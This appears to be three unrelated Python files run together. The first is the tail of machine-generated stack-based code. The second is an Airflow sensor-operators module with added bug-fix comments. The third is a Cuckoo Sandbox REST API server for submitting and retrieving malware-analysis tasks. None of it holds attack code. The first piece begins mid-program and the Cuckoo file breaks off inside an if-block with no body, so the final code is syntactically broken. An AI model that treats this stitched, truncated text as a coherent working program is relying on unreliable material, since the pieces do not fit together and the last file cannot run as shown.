return (42)if(sp()!=0)else(43)
def _42():
sp();
return 9
def _43():
sa(sr());
sa(gr(sr()+9,1))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(0)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr());
sa(gr(sr()+9,2))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(1)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr());
sa(gr(sr()+9,5))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(4)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr());
sa(gr(sr()+9,6))
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sp()+9)
sa(5)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa((0)if(sp()!=0)else(1))
return 41
def _44():
global t0
gw(2,4,t0)
return 23
def _45():
sa(sr());
gw(3,4,(sr()+gr(2,4))-6)
sa(sp()+9)
sa(2)
v0=sp()
sa(gr(sp(),v0))
sa(sp()*gr(gr(2,4)+9,2))
sa(sp()+gr(1,4))
sa(sp()+gr(gr(3,4),7))
gw(1,4,td(sr(),gr(2,1)))
return 24
def _46():
sa(sr()+9)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(7)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return 21
def _47():
global t0
gw(2,4,t0)
return 17
def _48():
sa(sr());
gw(3,4,(sr()+gr(2,4))-6)
sa(sp()+9)
sa(6)
v0=sp()
sa(gr(sp(),v0))
sa(sp()*gr(gr(2,4)+9,6)*gr(3,1))
sa(sp()+gr(1,4))
sa(sp()+gr(gr(3,4),9))
gw(1,4,td(sr(),gr(2,1)))
return 18
def _49():
sa(sr()+9)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(9)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()-1)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return 15
def _50():
global t0
global t1
sa(sr());
sa(sr());
t0=gr(sr()+9,0)
sa(sp()+9)
sa(1)
v0=sp()
t1=gr(sp(),v0)
t1=t1*gr(3,2)
sa(t0+t1+gr(1,3))
gw(1,3,td(sr(),gr(2,1)))
return 10
def _51():
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(5)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(4)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(1)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(0)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sp()-1)
sa(sr());
return 7
def _52():
global t0
gw(3,1,gr(3,1)+1)
t0=gr(3,1)
sa(gr(3,1))
sa(gr(3,1))
gw(1,0,0)
gw(2,0,t0)
return 4
def _53():
return (54)if((sr()-gr(1,0))!=0)else(5)
def _54():
gw(1,0,gr(3,0))
sa(sr());
return 4
def _55():
sa(sr()+8)
sa(0)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(8)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sp()-1)
sa(sr());
return 1
m=[_0,_1,_2,_3,_4,_5,_6,_7,_8,_9,_10,_11,_12,_13,_14,_15,_16,_17,_18,_19,_20,_21,_22,_23,_24,_25,_26,_27,_28,_29,_30,_31,_32,_33,_34,_35,_36,_37,_38,_39,_40,_41,_42,_43,_44,_45,_46,_47,_48,_49,_50,_51,_52,_53,_54,_55]
c=0
while c<56:
c=m[c]()
| |
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from datetime import datetime
import logging
from urllib.parse import urlparse
from time import sleep
from airflow import hooks, settings
from airflow.models import BaseOperator
from airflow.models import Connection as DB
from airflow.models import State
from airflow.models import TaskInstance
from airflow.utils import (
apply_defaults, AirflowException, AirflowSensorTimeout)
class BaseSensorOperator(BaseOperator):
    '''
    Sensor operators are derived from this class an inherit these attributes.

    Sensor operators keep executing at a time interval and succeed when
    a criteria is met and fail if and when they time out.

    :param poke_interval: Time in seconds that the job should wait in
        between each tries
    :type poke_interval: int
    :param timeout: Time, in seconds before the task times out and fails.
    :type timeout: int
    '''
    ui_color = '#e6f1f2'

    @apply_defaults
    def __init__(
            self,
            poke_interval=60,
            timeout=60*60*24*7,
            *args, **kwargs):
        super(BaseSensorOperator, self).__init__(*args, **kwargs)
        self.poke_interval = poke_interval
        self.timeout = timeout

    def poke(self, context):
        '''
        Function that the sensors defined while deriving this class should
        override.
        '''
        raise AirflowException('Override me.')

    def execute(self, context):
        '''Poke until the criteria is met or the timeout elapses.'''
        started_at = datetime.now()
        while not self.poke(context):
            sleep(self.poke_interval)
            # BUGFIX: timedelta.seconds only holds the sub-day remainder,
            # so with the default 7-day timeout the old `.seconds` check
            # effectively wrapped every 24 hours. total_seconds() counts
            # the full elapsed time.
            if (datetime.now() - started_at).total_seconds() > self.timeout:
                raise AirflowSensorTimeout('Snap. Time is OUT.')
        logging.info("Success criteria met. Exiting.")
class SqlSensor(BaseSensorOperator):
    """
    Runs a sql statement until a criteria is met. It will keep trying until
    sql returns no row, or if the first cell in (0, '0', '').

    :param conn_id: The connection to run the sensor against
    :type conn_id: string
    :param sql: The sql to run. To pass, it needs to return at least one cell
        that contains a non-zero / empty string value.
    """
    template_fields = ('sql',)
    template_ext = ('.hql', '.sql',)

    @apply_defaults
    def __init__(self, conn_id, sql, *args, **kwargs):
        super(SqlSensor, self).__init__(*args, **kwargs)
        self.sql = sql
        self.conn_id = conn_id
        # Resolve the hook eagerly so a bad conn_id fails at construction
        # time rather than on the first poke.
        session = settings.Session()
        db = session.query(DB).filter(DB.conn_id == conn_id).first()
        if not db:
            raise AirflowException("conn_id doesn't exist in the repository")
        self.hook = db.get_hook()
        session.commit()
        session.close()

    def poke(self, context):
        logging.info('Poking: ' + self.sql)
        records = self.hook.get_records(self.sql)
        if not records:
            return False
        # FIX: removed an unreachable `print(records[0][0])` that sat after
        # the return statements in the original implementation.
        return str(records[0][0]) not in ('0', '')
class ExternalTaskSensor(BaseSensorOperator):
    """
    Waits for a task to complete in a different DAG

    :param external_dag_id: The dag_id that contains the task you want to
        wait for
    :type external_dag_id: string
    :param external_task_id: The task_id that contains the task you want to
        wait for
    :type external_task_id: string
    :param allowed_states: list of allowed states, default is ``['success']``
    :type allowed_states: list
    :param execution_delta: time difference with the previous execution to
        look at, the default is the same execution_date as the current task.
        For yesterday, use [positive!] datetime.timedelta(days=1)
    :type execution_delta: datetime.timedelta
    """
    @apply_defaults
    def __init__(
            self,
            external_dag_id,
            external_task_id,
            allowed_states=None,
            execution_delta=None,
            *args, **kwargs):
        super(ExternalTaskSensor, self).__init__(*args, **kwargs)
        self.external_dag_id = external_dag_id
        self.external_task_id = external_task_id
        self.execution_delta = execution_delta
        self.allowed_states = allowed_states or [State.SUCCESS]

    def poke(self, context):
        logging.info(
            'Poking for '
            '{self.external_dag_id}.'
            '{self.external_task_id} on '
            '{context[execution_date]} ... '.format(**locals()))
        # Shift the probed execution_date backwards when a delta is given.
        if self.execution_delta:
            dttm = context['execution_date'] - self.execution_delta
        else:
            dttm = context['execution_date']
        ti = TaskInstance
        session = settings.Session()
        query = session.query(ti).filter(
            ti.dag_id == self.external_dag_id,
            ti.task_id == self.external_task_id,
            ti.execution_date == dttm,
            ti.state.in_(self.allowed_states),
        )
        count = query.count()
        session.commit()
        session.close()
        # Non-zero count means the external task reached an allowed state.
        return count
class HivePartitionSensor(BaseSensorOperator):
    """
    Waits for a partition to show up in Hive

    :param table: The name of the table to wait for, supports the dot
        notation (my_database.my_table)
    :type table: string
    :param partition: The partition clause to wait for. This is passed as
        is to the Metastore Thrift client "get_partitions_by_filter" method,
        and apparently supports SQL like notation as in `ds='2015-01-01'
        AND type='value'` and > < sings as in "ds>=2015-01-01"
    :type partition: string
    """
    template_fields = ('schema', 'table', 'partition',)

    @apply_defaults
    def __init__(
            self,
            table, partition="ds='{{ ds }}'",
            metastore_conn_id='metastore_default',
            schema='default',
            poke_interval=60*3,
            *args, **kwargs):
        super(HivePartitionSensor, self).__init__(
            poke_interval=poke_interval, *args, **kwargs)
        # An explicit empty/None partition falls back to the default clause.
        self.partition = partition or "ds='{{ ds }}'"
        self.metastore_conn_id = metastore_conn_id
        self.table = table
        self.schema = schema

    def poke(self, context):
        # Dotted table names carry their own schema; split them apart.
        if '.' in self.table:
            self.schema, self.table = self.table.split('.')
        logging.info(
            'Poking for table {self.schema}.{self.table}, '
            'partition {self.partition}'.format(**locals()))
        # Lazily create and cache the metastore hook on first use.
        if not hasattr(self, 'hook'):
            self.hook = hooks.HiveMetastoreHook(
                metastore_conn_id=self.metastore_conn_id)
        return self.hook.check_for_partition(
            self.schema, self.table, self.partition)
class HdfsSensor(BaseSensorOperator):
    """
    Waits for a file or folder to land in HDFS.
    """
    template_fields = ('filepath',)

    @apply_defaults
    def __init__(
            self,
            filepath,
            hdfs_conn_id='hdfs_default',
            *args, **kwargs):
        super(HdfsSensor, self).__init__(*args, **kwargs)
        self.filepath = filepath
        self.hdfs_conn_id = hdfs_conn_id

    def poke(self, context):
        sb = hooks.HDFSHook(self.hdfs_conn_id).get_conn()
        # snakebite logs noisily at INFO level; silence it per poke.
        logging.getLogger("snakebite").setLevel(logging.WARNING)
        logging.info(
            'Poking for file {self.filepath} '.format(**locals()))
        try:
            # ls() may be lazy, so materialize it to actually hit the
            # namenode; the result itself is not needed.
            list(sb.ls([self.filepath]))
        except Exception:
            # FIX: was a bare `except:`, which also swallowed SystemExit
            # and KeyboardInterrupt. Any ls failure means "not there yet".
            return False
        return True
class S3KeySensor(BaseSensorOperator):
    """
    Waits for a key (a file-like instance on S3) to be present in a S3 bucket.
    S3 being a key/value it does not support folders. The path is just a key
    a resource.

    :param bucket_key: The key being waited on. Supports full s3:// style url
        or relative path from root level.
    :type bucket_key: str
    :param bucket_name: Name of the S3 bucket
    :type bucket_name: str
    :param wildcard_match: whether the bucket_key should be interpreted as a
        Unix wildcard pattern
    :type wildcard_match: bool
    """
    template_fields = ('bucket_key', 'bucket_name')

    @apply_defaults
    def __init__(
            self, bucket_key,
            bucket_name=None,
            wildcard_match=False,
            s3_conn_id='s3_default',
            *args, **kwargs):
        super(S3KeySensor, self).__init__(*args, **kwargs)
        session = settings.Session()
        db = session.query(DB).filter(DB.conn_id == s3_conn_id).first()
        if not db:
            raise AirflowException("conn_id doesn't exist in the repository")
        # Parse: with no explicit bucket, split an s3://bucket/key URL.
        if bucket_name is None:
            parsed_url = urlparse(bucket_key)
            if parsed_url.netloc == '':
                raise AirflowException('Please provide a bucket_name')
            else:
                bucket_name = parsed_url.netloc
                # FIX: use startswith() so an empty path (e.g. "s3://bucket")
                # no longer raises IndexError on `path[0]`.
                if parsed_url.path.startswith('/'):
                    bucket_key = parsed_url.path[1:]
                else:
                    bucket_key = parsed_url.path
        self.bucket_name = bucket_name
        self.bucket_key = bucket_key
        self.wildcard_match = wildcard_match
        self.s3_conn_id = s3_conn_id
        session.commit()
        session.close()

    def poke(self, context):
        hook = hooks.S3Hook(s3_conn_id=self.s3_conn_id)
        # FIX: insert the missing '/' so the logged URL is well-formed
        # (the leading slash is stripped from bucket_key during parsing).
        full_url = "s3://" + self.bucket_name + "/" + self.bucket_key
        logging.info('Poking for key : {full_url}'.format(**locals()))
        if self.wildcard_match:
            return hook.check_for_wildcard_key(self.bucket_key,
                                               self.bucket_name)
        else:
            return hook.check_for_key(self.bucket_key, self.bucket_name)
class S3PrefixSensor(BaseSensorOperator):
    """
    Waits for a prefix to exist. A prefix is the first part of a key,
    thus enabling checking of constructs similar to glob airfl* or
    SQL LIKE 'airfl%'. There is the possibility to precise a delimiter to
    indicate the hierarchy or keys, meaning that the match will stop at that
    delimiter. Current code accepts sane delimiters, i.e. characters that
    are NOT special characters in the Python regex engine.

    :param bucket_name: Name of the S3 bucket
    :type bucket_name: str
    :param prefix: The prefix being waited on. Relative path from bucket root level.
    :type prefix: str
    :param delimiter: The delimiter intended to show hierarchy.
        Defaults to '/'.
    :type delimiter: str
    """
    template_fields = ('prefix', 'bucket_name')

    @apply_defaults
    def __init__(
            self, bucket_name,
            prefix, delimiter='/',
            s3_conn_id='s3_default',
            *args, **kwargs):
        super(S3PrefixSensor, self).__init__(*args, **kwargs)
        # Validate the connection id eagerly, at construction time.
        session = settings.Session()
        if not session.query(DB).filter(DB.conn_id == s3_conn_id).first():
            raise AirflowException("conn_id doesn't exist in the repository")
        session.commit()
        session.close()
        self.bucket_name = bucket_name
        self.prefix = prefix
        self.delimiter = delimiter
        self.full_url = "s3://" + bucket_name + '/' + prefix
        self.s3_conn_id = s3_conn_id

    def poke(self, context):
        logging.info('Poking for prefix : {self.prefix}\n'
                     'in bucket s3://{self.bucket_name}'.format(**locals()))
        hook = hooks.S3Hook(s3_conn_id=self.s3_conn_id)
        return hook.check_for_prefix(
            prefix=self.prefix,
            delimiter=self.delimiter,
            bucket_name=self.bucket_name)
class TimeSensor(BaseSensorOperator):
    """
    Waits until the specified time of the day.

    :param target_time: time after which the job succeeds
    :type target_time: datetime.time
    """
    template_fields = tuple()

    @apply_defaults
    def __init__(self, target_time, *args, **kwargs):
        super(TimeSensor, self).__init__(*args, **kwargs)
        self.target_time = target_time

    def poke(self, context):
        logging.info(
            'Checking if the time ({0}) has come'.format(self.target_time))
        # Succeed once the wall-clock time of day has passed the target.
        now = datetime.now().time()
        return now > self.target_time
class TimeDeltaSensor(BaseSensorOperator):
    """
    Waits for a timedelta after the task's execution_date + schedule_interval.
    In Airflow, the daily task stamped with ``execution_date``
    2016-01-01 can only start running on 2016-01-02. The timedelta here
    represents the time after the execution period has closed.

    :param delta: time length to wait after execution_date before succeeding
    :type delta: datetime.timedelta
    """
    template_fields = tuple()

    @apply_defaults
    def __init__(self, delta, *args, **kwargs):
        super(TimeDeltaSensor, self).__init__(*args, **kwargs)
        self.delta = delta

    def poke(self, context):
        # End of the schedule period, shifted by the configured delta.
        period_end = context['execution_date'] + context['dag'].schedule_interval
        target_dttm = period_end + self.delta
        logging.info('Checking if the time ({0}) has come'.format(target_dttm))
        return datetime.now() > target_dttm
class HttpSensor(BaseSensorOperator):
    """
    Executes a HTTP get statement and returns False on failure:
    404 not found or response_check function returned False

    :param http_conn_id: The connection to run the sensor against
    :type http_conn_id: string
    :param endpoint: The relative part of the full url
    :type endpoint: string
    :param params: The parameters to be added to the GET url
    :type params: a dictionary of string key/value pairs
    :param headers: The HTTP headers to be added to the GET request
    :type headers: a dictionary of string key/value pairs
    :param response_check: A check against the 'requests' response object.
        Returns True for 'pass' and False otherwise.
    :type response_check: A lambda or defined function.
    :param extra_options: Extra options for the 'requests' library, see the
        'requests' documentation (options to modify timeout, ssl, etc.)
    :type extra_options: A dictionary of options, where key is string and value
        depends on the option that's being modified.
    """
    template_fields = ('endpoint',)

    @apply_defaults
    def __init__(self,
                 endpoint,
                 http_conn_id='http_default',
                 params=None,
                 headers=None,
                 response_check=None,
                 extra_options=None, *args, **kwargs):
        super(HttpSensor, self).__init__(*args, **kwargs)
        self.endpoint = endpoint
        self.http_conn_id = http_conn_id
        self.params = params or {}
        self.headers = headers or {}
        self.extra_options = extra_options or {}
        self.response_check = response_check
        self.hook = hooks.HttpHook(method='GET', http_conn_id=http_conn_id)

    def poke(self, context):
        logging.info('Poking: ' + self.endpoint)
        try:
            response = self.hook.run(self.endpoint,
                                     data=self.params,
                                     headers=self.headers,
                                     extra_options=self.extra_options)
            if self.response_check:
                # run content check on response
                return self.response_check(response)
        except AirflowException as ae:
            # FIX: use str(ae) -- `BaseException.message` was removed in
            # Python 3 and this module targets 2/3 via the `future` lib.
            if str(ae).startswith("404"):
                return False
            # NOTE(review): non-404 errors fall through to `return True`,
            # i.e. the sensor succeeds; this mirrors the original behavior
            # but looks suspicious -- confirm intent before changing.
        return True
| |
#!/usr/bin/env python
# Copyright (C) 2010-2013 Claudio Guarnieri.
# Copyright (C) 2014-2016 Cuckoo Foundation.
# This file is part of Cuckoo Sandbox - http://www.cuckoosandbox.org
# See the file 'docs/LICENSE' for copying permission.
import os
import sys
import socket
import tarfile
import argparse
from datetime import datetime
from StringIO import StringIO
from zipfile import ZipFile, ZIP_STORED
try:
from flask import Flask, request, jsonify, make_response
except ImportError:
sys.exit("ERROR: Flask library is missing (`pip install flask`)")
sys.path.insert(0, os.path.join(os.path.abspath(os.path.dirname(__file__)), ".."))
from lib.cuckoo.common.constants import CUCKOO_VERSION, CUCKOO_ROOT
from lib.cuckoo.common.utils import store_temp_file, delete_folder
from lib.cuckoo.core.database import Database, TASK_RUNNING, Task
from lib.cuckoo.core.database import TASK_REPORTED, TASK_COMPLETED
from lib.cuckoo.core.startup import drop_privileges
from lib.cuckoo.core.rooter import rooter
# Global Database object, shared by all request handlers below.
db = Database()
# Initialize Flask app (routes are registered on it via decorators).
app = Flask(__name__)
def json_error(status_code, message):
    """Return a JSON object with a HTTP error code."""
    response = jsonify(message=message)
    response.status_code = status_code
    return response
@app.after_request
def custom_headers(response):
    """Attach hardening and no-cache headers to every HTTP response."""
    extra_headers = (
        ("Server", "Machete Server"),
        ("X-Content-Type-Options", "nosniff"),
        ("X-Frame-Options", "DENY"),
        ("X-XSS-Protection", "1; mode=block"),
        ("Pragma", "no-cache"),
        ("Cache-Control", "no-cache"),
        ("Expires", "0"),
    )
    for name, value in extra_headers:
        response.headers[name] = value
    return response
@app.route("/tasks/create/file", methods=["POST"])
@app.route("/v1/tasks/create/file", methods=["POST"])
def tasks_create_file():
    """Submit an uploaded file as a new analysis task."""
    data = request.files["file"]
    form = request.form
    # NOTE: any non-empty string (including "false") enables these flags;
    # this mirrors the original truthiness-based behavior.
    memory = form.get("memory", False)
    if memory:
        memory = True
    enforce_timeout = form.get("enforce_timeout", False)
    if enforce_timeout:
        enforce_timeout = True
    temp_file_path = store_temp_file(data.read(), data.filename)
    task_id = db.add_path(
        file_path=temp_file_path,
        package=form.get("package", ""),
        timeout=form.get("timeout", ""),
        priority=form.get("priority", 1),
        options=form.get("options", ""),
        machine=form.get("machine", ""),
        platform=form.get("platform", ""),
        tags=form.get("tags", None),
        custom=form.get("custom", ""),
        owner=form.get("owner", ""),
        memory=memory,
        enforce_timeout=enforce_timeout,
        clock=form.get("clock", None)
    )
    return jsonify(task_id=task_id)
@app.route("/tasks/create/url", methods=["POST"])
@app.route("/v1/tasks/create/url", methods=["POST"])
def tasks_create_url():
    """Submit a URL as a new analysis task."""
    form = request.form
    # NOTE: any non-empty string (including "false") enables these flags;
    # this mirrors the original truthiness-based behavior.
    memory = form.get("memory", False)
    if memory:
        memory = True
    enforce_timeout = form.get("enforce_timeout", False)
    if enforce_timeout:
        enforce_timeout = True
    task_id = db.add_url(
        url=form.get("url"),
        package=form.get("package", ""),
        timeout=form.get("timeout", ""),
        options=form.get("options", ""),
        priority=form.get("priority", 1),
        machine=form.get("machine", ""),
        platform=form.get("platform", ""),
        tags=form.get("tags", None),
        custom=form.get("custom", ""),
        owner=form.get("owner", ""),
        memory=memory,
        enforce_timeout=enforce_timeout,
        clock=form.get("clock", None)
    )
    return jsonify(task_id=task_id)
@app.route("/tasks/list")
@app.route("/v1/tasks/list")
@app.route("/tasks/list/<int:limit>")
@app.route("/v1/tasks/list/<int:limit>")
@app.route("/tasks/list/<int:limit>/<int:offset>")
@app.route("/v1/tasks/list/<int:limit>/<int:offset>")
def tasks_list(limit=None, offset=None):
    """List tasks, optionally filtered by owner/status/completion time."""
    completed_after = request.args.get("completed_after")
    if completed_after:
        completed_after = datetime.fromtimestamp(int(completed_after))
    tasks = []
    rows = db.list_tasks(limit=limit, details=True, offset=offset,
                         completed_after=completed_after,
                         owner=request.args.get("owner"),
                         status=request.args.get("status"),
                         order_by=Task.completed_on.asc())
    for row in rows:
        task = row.to_dict()
        # Sanitize the target in case it contains non-ASCII characters as we
        # can't pass along an encoding to flask's jsonify().
        task["target"] = task["target"].decode("latin-1")
        task["guest"] = row.guest.to_dict() if row.guest else {}
        task["errors"] = [error.message for error in row.errors]
        if row.sample_id:
            task["sample"] = db.view_sample(row.sample_id).to_dict()
        else:
            task["sample"] = {}
        tasks.append(task)
    return jsonify({"tasks": tasks})
@app.route("/tasks/view/<int:task_id>")
@app.route("/v1/tasks/view/<int:task_id>")
def tasks_view(task_id):
    """Return the full details of a single task."""
    task = db.view_task(task_id, details=True)
    if not task:
        r = jsonify(message="Task not found")
        r.status_code = 404
        return r
    entry = task.to_dict()
    entry["guest"] = task.guest.to_dict() if task.guest else {}
    entry["errors"] = [error.message for error in task.errors]
    if task.sample_id:
        entry["sample"] = db.view_sample(task.sample_id).to_dict()
    else:
        entry["sample"] = {}
    return jsonify({"task": entry})
@app.route("/tasks/reschedule/<int:task_id>")
@app.route("/tasks/reschedule/<int:task_id>/<int:priority>")
@app.route("/v1/tasks/reschedule/<int:task_id>")
@app.route("/v1/tasks/reschedule/<int:task_id>/<int:priority>")
def tasks_reschedule(task_id, priority=None):
    """Clone an existing task into a fresh pending task."""
    if not db.view_task(task_id):
        return json_error(404, "There is no analysis with the specified ID")
    new_task_id = db.reschedule(task_id, priority)
    if not new_task_id:
        return json_error(500, "An error occurred while trying to "
                               "reschedule the task")
    return jsonify({"status": "OK", "task_id": new_task_id})
@app.route("/tasks/delete/<int:task_id>")
@app.route("/v1/tasks/delete/<int:task_id>")
def tasks_delete(task_id):
    """Delete a task and its stored analysis folder."""
    task = db.view_task(task_id)
    if not task:
        return json_error(404, "Task not found")
    if task.status == TASK_RUNNING:
        return json_error(500, "The task is currently being "
                               "processed, cannot delete")
    if not db.delete_task(task_id):
        return json_error(500, "An error occurred while trying to "
                               "delete the task")
    delete_folder(os.path.join(CUCKOO_ROOT, "storage",
                               "analyses", "%d" % task_id))
    return jsonify({"status": "OK"})
@app.route("/tasks/report/<int:task_id>")
@app.route("/v1/tasks/report/<int:task_id>")
@app.route("/tasks/report/<int:task_id>/<report_format>")
@app.route("/v1/tasks/report/<int:task_id>/<report_format>")
def tasks_report(task_id, report_format="json"):
    """Return an analysis report, either as a single json/html file or as
    a tar archive of selected analysis artifacts ("all", "dropped",
    "package_files")."""
    # Single-file report formats: format name -> file under reports/.
    formats = {
        "json": "report.json",
        "html": "report.html",
    }
    # Archive formats: "-" means "everything except these files",
    # "+" means "only these files".
    bz_formats = {
        "all": {"type": "-", "files": ["memory.dmp"]},
        "dropped": {"type": "+", "files": ["files"]},
        "package_files": {"type": "+", "files": ["package_files"]},
    }
    # Supported tar compression modes, selected via the ?tar= query arg.
    tar_formats = {
        "bz2": "w:bz2",
        "gz": "w:gz",
        "tar": "w",
    }
    if report_format.lower() in formats:
        report_path = os.path.join(CUCKOO_ROOT, "storage", "analyses",
                                   "%d" % task_id, "reports",
                                   formats[report_format.lower()])
    elif report_format.lower() in bz_formats:
        bzf = bz_formats[report_format.lower()]
        srcdir = os.path.join(CUCKOO_ROOT, "storage",
                              "analyses", "%d" % task_id)
        s = StringIO()
        # By default go for bz2 encoded tar files (for legacy reasons).
        tarmode = tar_formats.get(request.args.get("tar"), "w:bz2")
        tar = tarfile.open(fileobj=s, mode=tarmode, dereference=True)
        for filedir in os.listdir(srcdir):
            filepath = os.path.join(srcdir, filedir)
            if not os.path.exists(filepath):
                continue
            # Apply the include ("+") / exclude ("-") filter defined above.
            if bzf["type"] == "-" and filedir not in bzf["files"]:
                tar.add(filepath, arcname=filedir)
            if bzf["type"] == "+" and filedir in bzf["files"]:
                tar.add(filepath, arcname=filedir)
        tar.close()
        response = make_response(s.getvalue())
        response.headers["Content-Type"] = \
            "application/x-tar; charset=UTF-8"
        return response
    else:
        return json_error(400, "Invalid report format")
    # Only reached for the single-file formats resolved above.
    if os.path.exists(report_path):
        if report_format == "json":
            response = make_response(open(report_path, "rb").read())
            response.headers["Content-Type"] = "application/json"
            return response
        else:
            return open(report_path, "rb").read()
    else:
        return json_error(404, "Report not found")
@app.route("/tasks/screenshots/<int:task_id>")
@app.route("/v1/tasks/screenshots/<int:task_id>")
@app.route("/tasks/screenshots/<int:task_id>/<screenshot>")
@app.route("/v1/tasks/screenshots/<int:task_id>/<screenshot>")
def task_screenshots(task_id=0, screenshot=None):
    """Return one screenshot as JPEG, or all screenshots zipped."""
    folder_path = os.path.join(CUCKOO_ROOT, "storage", "analyses", str(task_id), "shots")
    if not os.path.exists(folder_path):
        return json_error(404, "Task not found")
    if screenshot:
        screenshot_name = "{0}.jpg".format(screenshot)
        screenshot_path = os.path.join(folder_path, screenshot_name)
        if not os.path.exists(screenshot_path):
            return json_error(404, "Screenshot not found!")
        # FIX: close the file handle (was open(...).read(), which leaked it).
        # TODO: Add content disposition.
        with open(screenshot_path, "rb") as f:
            response = make_response(f.read())
        response.headers["Content-Type"] = "image/jpeg"
        return response
    zip_data = StringIO()
    with ZipFile(zip_data, "w", ZIP_STORED) as zip_file:
        for shot_name in os.listdir(folder_path):
            zip_file.write(os.path.join(folder_path, shot_name), shot_name)
    # TODO: Add content disposition.
    response = make_response(zip_data.getvalue())
    response.headers["Content-Type"] = "application/zip"
    return response
@app.route("/tasks/rereport/<int:task_id>")
def rereport(task_id):
    """Flip a reported task back to completed so it gets reprocessed."""
    task = db.view_task(task_id)
    if not task:
        return json_error(404, "Task not found")
    if task.status != TASK_REPORTED:
        return jsonify(success=False)
    db.set_status(task_id, TASK_COMPLETED)
    return jsonify(success=True)
@app.route("/tasks/reboot/<int:task_id>")
def reboot(task_id):
    """Schedule a reboot analysis for an existing task."""
    reboot_id = Database().add_reboot(task_id=task_id)
    if reboot_id:
        return jsonify(task_id=task_id, reboot_id=reboot_id)
    return json_error(404, "Error creating reboot task")
@app.route("/files/view/md5/<md5>")
@app.route("/v1/files/view/md5/<md5>")
@app.route("/files/view/sha256/<sha256>")
@app.route("/v1/files/view/sha256/<sha256>")
@app.route("/files/view/id/<int:sample_id>")
@app.route("/v1/files/view/id/<int:sample_id>")
def files_view(md5=None, sha256=None, sample_id=None):
    """Look up a sample by md5, sha256 or database id."""
    if md5:
        sample = db.find_sample(md5=md5)
    elif sha256:
        sample = db.find_sample(sha256=sha256)
    elif sample_id:
        sample = db.view_sample(sample_id)
    else:
        return json_error(400, "Invalid lookup term")
    if not sample:
        return json_error(404, "File not found")
    return jsonify({"sample": sample.to_dict()})
@app.route("/files/get/<sha256>")
@app.route("/v1/files/get/<sha256>")
def files_get(sha256):
    """Return the stored sample binary identified by its sha256."""
    file_path = os.path.join(CUCKOO_ROOT, "storage", "binaries", sha256)
    if not os.path.exists(file_path):
        return json_error(404, "File not found")
    # FIX: close the file handle (was open(...).read(), which leaked it).
    with open(file_path, "rb") as f:
        response = make_response(f.read())
    response.headers["Content-Type"] = \
        "application/octet-stream; charset=UTF-8"
    return response
@app.route("/pcap/get/<int:task_id>")
@app.route("/v1/pcap/get/<int:task_id>")
def pcap_get(task_id):
    """Return the network capture (dump.pcap) of a task."""
    file_path = os.path.join(CUCKOO_ROOT, "storage", "analyses",
                             "%d" % task_id, "dump.pcap")
    if not os.path.exists(file_path):
        return json_error(404, "File not found")
    try:
        # TODO This could be a big file, so eventually we have to switch
        # to app.send_static_file() instead.
        # FIX: `with` closes the handle; the bare `except:` is narrowed
        # to Exception so SystemExit/KeyboardInterrupt propagate.
        with open(file_path, "rb") as f:
            response = make_response(f.read())
        response.headers["Content-Type"] = \
            "application/octet-stream; charset=UTF-8"
        return response
    except Exception:
        return json_error(500, "An error occurred while reading PCAP")
@app.route("/machines/list")
@app.route("/v1/machines/list")
def machines_list():
    """List all analysis machines known to the scheduler."""
    machines = [row.to_dict() for row in db.list_machines()]
    return jsonify({"machines": machines})
@app.route("/machines/view/<name>")
@app.route("/v1/machines/view/<name>")
def machines_view(name=None):
    """Return the details of a single analysis machine."""
    machine = db.view_machine(name=name)
    if not machine:
        return json_error(404, "Machine not found")
    return jsonify({"machine": machine.to_dict()})
@app.route("/cuckoo/status")
@app.route("/v1/cuckoo/status")
def cuckoo_status():
    """Report version, machine/task counters, disk, CPU and memory stats."""
    # In order to keep track of the diskspace statistics of the temporary
    # directory we create a temporary file so we can statvfs() on that.
    temp_file = store_temp_file("", "status")
    paths = dict(
        binaries=os.path.join(CUCKOO_ROOT, "storage", "binaries"),
        analyses=os.path.join(CUCKOO_ROOT, "storage", "analyses"),
        temporary=temp_file,
    )
    diskspace = {}
    for key, path in paths.items():
        # statvfs() is POSIX-only; skip the whole block on e.g. Windows.
        if hasattr(os, "statvfs") and os.path.isdir(path):
            stats = os.statvfs(path)
            diskspace[key] = dict(
                free=stats.f_bavail * stats.f_frsize,
                total=stats.f_blocks * stats.f_frsize,
                used=(stats.f_blocks - stats.f_bavail) * stats.f_frsize,
            )
    # Now we remove the temporary file and its parent directory.
    os.unlink(temp_file)
    os.rmdir(os.path.dirname(temp_file))
    # Get the CPU load.
    if hasattr(os, "getloadavg"):
        cpuload = os.getloadavg()
    else:
        cpuload = []
    if os.path.isfile("/proc/meminfo"):
        values = {}
        for line in open("/proc/meminfo"):
            key, value = line.split(":", 1)
            values[key.strip()] = value.replace("kB", "").strip()
        if "MemAvailable" in values and "MemTotal" in values:
            # BUGFIX: previously read values["MemFree"] even though the
            # guard checks for MemAvailable. MemAvailable is the kernel's
            # estimate of memory usable without swapping and is what this
            # percentage is meant to express.
